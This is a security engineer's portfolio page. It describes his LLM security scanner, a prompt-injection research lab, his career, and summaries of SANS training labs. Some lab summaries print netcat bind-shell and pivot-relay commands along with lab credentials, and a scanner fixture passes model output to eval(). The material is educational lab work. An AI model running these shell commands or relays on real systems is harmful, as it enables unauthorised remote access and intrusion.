Skip to main content

Luis Javier Lozoya

Software Engineer · Application Security · AI/LLM Security

I secure AI applications and the AWS systems they run on. I ship llm-audit, an OWASP LLM Top 10 scanner on npm. Five years of production React and Next.js is why I know where the bugs hide. Charleston, SC. Open to remote US roles.

GIAC GCIH + GSEC + GFACT · HackOps 2024 1st Place  ·  HarborHack 2025 Speaker  ·  US Work Authorized

Resume
Luis Javier Lozoya, Software Engineer, Application Security, AI/LLM Security
~/gsec-labs - zsh
luis@sec401$
Lab 1 / 6Network Forensics

Flagship project · Open source · MIT

llm-audit

Static analysis for TypeScript and JavaScript LLM applications. OWASP LLM Top 10 at commit time. It catches the security failure modes AI coding assistants quietly introduce, in the TS/JS ecosystem Semgrep's official AI pack does not cover.

install
shell
npm i -D llm-audit
npx llm-audit demo           # all 12 rules vs bundled vulnerable fixtures
npx llm-audit demo
output
test/fixtures/llm-output-insecure-handling/vulnerable.tsx  6 findings

  ✗ error   llm-output-insecure-handling  LLM10  line 18
      LLM model output is flowing into a dangerous sink (eval /
      new Function / child_process / dangerouslySetInnerHTML).

     17 │   // ruleid: llm-output-insecure-handling
     18 │   return eval(r.choices[0].message.content as string);
     19 │ }
     ...
────────────────────────────────────────────────────────────
42 findings  31 error · 11 warning  in 12 files · 12 of 12 rules fired

Portfolio

Selected work, organized by focus.

LLM Red Team Lab: Prompt-Injection Research (2026, in progress) project screenshot

LLM Red Team Lab: Prompt-Injection Research (2026, in progress)

Role: Solo security research: attack design, evaluation harness, mitigation patterns, writeups

Reproducible red-team study of prompt-injection techniques mapped to OWASP LLM Top 10 and MITRE ATLAS, tested across frontier and budget-tier models via Vercel AI Gateway. Three attacks seeded so far, across LLM01, LLM02, and LLM08.

Problem

Production LLM features ship with informal defenses. Whether they hold up under structured attack chains is mostly anecdote, with no published, reproducible matrix of attack vs. model vs. mitigation in the open TS/JS ecosystem.

Approach

Catalog prompt-injection techniques mapped to OWASP LLM Top 10 and MITRE ATLAS. Run each attack across frontier and budget-tier models via Vercel AI Gateway. Pin model IDs and commit prompts to source so every result is reproducible. Each attack ships paired with a defensive mitigation.

Outcome

Live at /ai-playground with three seeded attacks: instruction override (LLM01), PII exfiltration via storytelling (LLM02), and system prompt extraction via summary (LLM08). Next: the attack vs. model vs. mitigation matrix, transcripts, and a live sandbox.

OWASP LLM Top 10MITRE ATLASVercel AI GatewayNext.jsTypeScript
AfricaNXT: Global Mentorship Platform (via GDNA) project screenshot

AfricaNXT: Global Mentorship Platform (via GDNA)

Mentorship platform onboarding ~1,200 users. Built React UI components and the authentication flow with security-focused defaults.

Problem

Mentorship platform needed secure, scalable onboarding for ~1,200 users.

Solution

React UI components and a Cognito-backed authentication flow with session handling and security headers. Input validation across 4 form types covering ~40 questions. Infrastructure provisioned with scoped IAM access controls.

Impact

60% improvement in onboarding efficiency. Secure registration and sign-in live in production.

AWS CognitoIAMLambdaReactNext.js

Experience

5+ years across startups, agencies, and independent consulting

GDNA company logo

Security Focused Software Engineer (Contract)

Current
AWS & Cloud Solutions
Mar 2024 to Present
Mount Pleasant, SC

Security review, auth, and IAM for serverless client apps on AWS. Joined translating Figma designs into React/Next.js. Now owns architecture, API design, and database design.

Key Achievements:

  • Security review and dependency analysis on hybrid AWS and MongoDB architectures, surfacing exposure paths before deployment
  • Cognito auth flows with session management, input validation, and security headers across production apps
  • Least-privilege IAM across 15+ AWS resources (Lambda, S3, API Gateway, RDS): a scoped role per function, Secrets Manager for credentials, S3 bucket policies
  • SOC 2 Type 1 readiness: collected control evidence across AWS infrastructure, reviewed configurations, contributed to security policy docs
  • Architecture, API, and database design for client apps, demoed to clients weekly

Technologies Used:

AWS API GatewayLambdaS3RDSCognitoIAMSecrets ManagerAmplifyReactTypeScriptNext.jsPostgreSQLMongoDB
Querri company logo

Software Engineer (Contract)

Data Analytics & Business Intelligence
Aug 2023 to Mar 2024
Mount Pleasant, SC

Auth and access control for a Svelte product app, plus Querri's HubSpot marketing site.

Key Achievements:

  • FusionAuth authentication with secure session handling, role-based access control, and audit logging for a Svelte product app
  • Hardened front-end and embedded code paths against XSS, CSRF, and IDOR during feature development
  • Built and maintained custom HubSpot CMS modules and templates for the marketing site

Technologies Used:

SvelteHubSpot CMSHTMLCSSJavaScriptFusionAuthAWS
Interloop company logo

Software Engineer I → II

Data Analytics & Business Intelligence
Jul 2021 to Jun 2023
Charleston, SC

First engineering role after JRS Coding School bootcamp. Promoted from Software Engineer I to II. Full-stack development on Angular/NestJs with Azure cloud services.

Key Achievements:

  • Led Angular, NestJs, and MongoDB projects with authentication, authorization, and input validation designed into the APIs
  • Built custom Chrome extensions integrated with CRM tools using RESTful APIs and OAuth 2.0
  • Created Azure Functions with various triggers, reducing infrastructure costs for client workloads
  • Mentored junior engineers through security-aware code reviews and pair programming

Technologies Used:

AngularNestJsMongoDBAzure Cosmos DBAzure FunctionsTypeScriptNode.jsREST APIsOAuth2.0

About

Current work, then the path that got me here.

These days, most of my work lives where shipping software meets breaking it. Right now I'm running a prompt-injection lab against a chatbot I built, testing how well the usual defenses hold up under realistic attack patterns. Findings live at /ai-playground. That work fed into llm-audit, an OWASP LLM Top 10 static analyzer I ship on npm for TypeScript and JavaScript codebases.

By day I'm at GDNA, doing security review, auth, and IAM for serverless apps on AWS. The interesting parts sit on the boundary between feature development and security: input validation, auth flows, S3 policies, secrets handling, and figuring out where things break when no one's watching.

My security path started with the SANS Cyber Academy scholarship, which got me the GIAC GFACT, GSEC, and GCIH certifications. PortSwigger BSCP is in progress, targeting Q4 2026, then AWS Security Specialty (SCS-C03) in Q1 2027. The focus from here is AI and LLM security plus cloud security engineering.

Before software: I'm from Spain, six years in commercial construction (structural detailing, CAD, project management). Studied architectural engineering at IE University.

I'm looking for a full-time Senior Application Security or AI Security Engineer role, remote US or Charleston. I also take a small number of contract engagements through my consultancy, IberiaTech Solutions: fixed scope security reviews for AI built apps. You vibe coded the MVP. I make sure it is safe to ship. Email luis.lozoya.tech@gmail.com.

1st Place, HackOps 2024Judge, HarborHack 2024Speaker, HarborHack 2025

Credentials

GIAC GCIH certification

GIAC GCIH

SANS Institute · Aug 2026
Verify
GIAC GSEC certification

GIAC GSEC

SANS Institute · Apr 2026
Verify
GIAC GFACT certification

GIAC GFACT

SANS Institute · Jan 2026
Verify
Cybersecurity / SysAdmin certification

Cybersecurity / SysAdmin

Purdue / Ivy Tech · 2023
Intro to AI certification

Intro to AI

Google (Coursera) · 2025
In progressPortSwigger Web Academy10/61 Apprentice labsAWS Security Specialty
PlannedTryHackMe AI Security (AI1)HackTheBox AI Red Teamer pathTCM PWPA (Web Pentest)

Updated Oct 3, 2026

Security Labs

29 labs

Hands-on labs with real captures and full writeups.

Network ForensicsCloud Network ForensicsPassword Management & CryptographyData Security & DLPNetwork SecurityWeb Application SecurityCryptographyIntrusion DetectionWindows SecurityLinux Security
Cloud Network Forensics

AWS VPC Flow Log Analysis

Analyzed 173K VPC flow records across 579 log files: isolated 33,232 attacker flows from 20.106.124.93, determined a 6.5-hour attack window, quantified 265MB exfiltrated on port 8889 and 190MB on port 80, and confirmed the full attack surface (HTTP, SSH, 8889) using PCAP-to-NetFlow conversion with nfpcapd/nfdump.

AWS VPC Flow Logszcatzgrepawk
Read write-up
Network Forensics

Wireshark Packet Analysis

Investigated a 628K-packet PCAP in Wireshark: used protocol hierarchy and conversation statistics to surface a port-80 scanning pattern from 3.142.238.241, followed an HTTP stream revealing a successful WordPress brute-force login (Hydra, admin/#AlphaInc!), and completed a live-capture exercise extracting an HTTP object from loopback traffic.

WiresharkPCAP analysisDisplay filtersHTTP stream following
Read write-up
Network Forensics

tcpdump Traffic Analysis

Analyzed PCAP traffic with tcpdump: identified /.env probing, WordPress brute-force with Hydra, and cleartext login parameters visible in the HTTP payload.

tcpdumpdigPCAP analysisCLI
Read write-up
Intrusion Detection

Intrusion Detection and Network Security Monitoring with Snort3 and Zeek

Validated Snort 3.1.73 config, tightened HOME_NET to 10.130.0.0/16, ran the community ruleset against investigate.pcap, and surfaced an SSH CRC32 overflow shellcode pattern (294 alerts from 20.106.124.93 → 10.130.8.94:22). Re-ran Snort with a BPF filter pinned to the attacker IP, then processed the same PCAP with Zeek's extract-all-files policy and confirmed log output.

Snort 3.1.73.0Zeeksnort3-community.rulesBPF
Read write-up
Network Security

Netcat for Data Transfer, Shells, and Pivot Relays

Used netcat between a Slingshot Linux host and a Windows host for listener/client chat, then transferred files both ways (Get-Content piped into nc on Windows, redirect out on Linux, and the reverse with Out-File). Set up bind shells on both operating systems (nc -l -p 7777 -e /bin/sh on Linux; nc <ip> 8888 -e cmd.exe on Windows), confirming SYSTEM-adjacent context on each. The finale was a pivot: the attacker could not reach 172.30.0.55, but a compromised pivot host at 172.30.0.50 could. A named-pipe relay (mkfifo namedpipe; nc -l -p 8080 < namedpipe | nc 172.30.0.55 80 > namedpipe) let the attacker curl the target through the pivot; the target's access log showed the pivot's IP, not the attacker's.

netcat (traditional)PowerShellmkfifocurl
Read write-up
Network Security

SMB Share Enumeration and Credential Discovery

Started with credentials for tdoudney and listed shares on 172.30.0.22 (IT, CustomerDev, Home, plus the default SYSVOL/NETLOGON/C$/ADMIN$/IPC$). The IT share held logon.cmd (drive mappings) and netssh.cmd (a proxy config pointing at proxy.falsimentis.com:3128). The Home share exposed every user's directory; csparkes was correctly locked (ACCESS_DENIED) but tdoudney's own directory held backup.ps1 and backup.ps1.OLD. The current script used Get-Credential correctly, but the .OLD version hardcoded ConvertTo-SecureString 'Clippers2022' for falsimentis.com\csparkes. Reusing csparkes/Clippers2022 opened the CustomerDev share, which contained a web app tree and db.backup.sql.zip (33.8 MB).

smbclientNmap 7.60tarSlingshot Linux
Read write-up

Labs are from SANS Cyber Academy.

AppSec Notes

Public notes from every security course I take, in my own words.

  • TCM Practical Bug Bounty (PBB) badge

    TCM Practical Bug Bounty (PBB)

    Web pentest practice. PWPA exam planned.

  • PortSwigger Web Security Academy badge

    PortSwigger Web Security Academy

    Burp Suite Certified Practitioner (BSCP) prep

Browse all notes

Fit Check

Would Luis be a good fit?

Paste a job description and get an honest AI assessment of how Luis's experience maps to the role.

0 characters

Sent to OpenAI to generate the assessment. Not stored here. Do not paste anything confidential. Privacy

Contact

Hiring for AppSec or AI Security? Let's talk. Reach out via the form below or connect on LinkedIn

luis.lozoya.tech@gmail.com. I reply within 24 hours to recruiters and hiring managers.

Luis Javier Lozoya | Software Engineer · Application Security · AI/LLM Security